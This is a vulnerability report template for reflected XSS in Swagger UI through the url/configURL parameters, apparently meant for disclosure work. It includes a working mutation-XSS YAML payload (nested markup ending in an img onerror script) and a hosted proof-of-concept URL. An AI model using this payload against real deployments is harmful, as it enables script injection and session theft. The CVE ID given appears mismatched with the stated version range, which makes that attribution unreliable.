
Swagger-UI XSS Vulnerability Report Template


Swagger Reflected XSS Vulnerability in “URL/configURL” Parameter on “Endpoint”

Overview

  • Vulnerability Type: Reflected Cross-Site Scripting (XSS)
  • Affected Component: Swagger UI
  • Location: https://the-red.team/templates/swagger-xss
  • Parameter: URL/configURL
  • Severity: Medium (6.1)
  • CVE ID: CVE-2016-1000229
  • CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Description

An XSS vulnerability has been identified in the Swagger UI component, specifically in its handling of YAML configuration files imported via the url and configURL parameters. This vulnerability arises due to inadequate input validation and sanitization of user-supplied data in the Swagger UI interface, allowing an attacker to inject and execute arbitrary JavaScript code within the context of a user’s browser.

Impact

If successfully exploited, this vulnerability could lead to various attacks, including but not limited to:

  • Session hijacking
  • Data theft
  • Malicious code execution
  • Defacement of the application

Affected Versions:

  • The vulnerability has been confirmed in Swagger UI 3.14.0 and later versions before 3.38.0

Other versions might also be affected, and it is recommended to assess all versions of the Swagger UI component.

Recommendation:

To mitigate the risk associated with this vulnerability, the following actions are recommended:

  1. Update: Apply the latest patches or updates provided by the vendor to address this vulnerability. (See https://swagger.io/tools/swagger-ui/)
  2. Input Sanitization: Implement strict input validation and sanitization mechanisms to prevent malicious inputs from being processed.
  3. Content Security Policy (CSP): Enforce a robust CSP to restrict the execution of unauthorized scripts.
  4. Security Headers: Configure appropriate security headers (e.g., X-XSS-Protection) to enhance browser security.
  5. Regular Security Audits: Conduct regular security audits and penetration testing to identify and remediate vulnerabilities proactively.

Steps to Reproduce:

The following steps demonstrate how an attacker could exploit this vulnerability:

  1. Access the Swagger UI interface located at vulnerable-url.com/swagger
  2. Access the payload using https://the-red.team/poc/swagger-xss.yaml or host the file below, making sure to set the proper headers so the endpoint can access it.

swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts

  3. Import a YAML configuration file using the “url” or “configURL” parameter.
  4. Inject and submit a malicious JavaScript payload within the YAML file.
  5. Observe if the payload gets executed within the context of the application.

Proof of Concept (PoC):

Visit the following URL to see that the script is executed: https://test.test/swagger?url=https://the-red.team/poc/swagger-xss.yaml

Additional Information:

Vendor Advisory: [Link to vendor advisory, if available]
CVE Details: [Link to CVE details, if applicable]

Contact: [Your contact information]
Date Reported: [Date of reporting]
PoC YAML file:

References